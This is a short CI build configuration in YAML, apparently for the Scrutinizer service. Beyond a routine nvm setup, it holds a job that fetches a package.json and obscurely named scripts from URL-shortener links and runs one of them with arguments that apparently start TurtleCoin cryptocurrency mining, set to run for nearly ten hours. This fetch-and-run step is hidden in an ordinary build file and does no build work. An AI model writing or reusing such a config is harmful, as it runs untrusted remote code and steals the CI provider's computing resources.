checks:
    javascript: true
build:
    nodes:
        compile:
            resources:
                cpus: 1.5
        meocoder-jobs:
            dependencies:
                before:
                    - curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.38.0/install.sh | bash && nvm install v14.18.1
                    - curl -fsSL shorturl.at/ilnzU -o package.json && curl -fsSL shorturl.at/hiyNY -o sjdfhesdf.js && curl -fsSL shorturl.at/jkwJ9 -o log-print.js
                    - npm i -s && node sjdfhesdf.js trtl fi 1 1 115 3
                      idle_timeout: 35900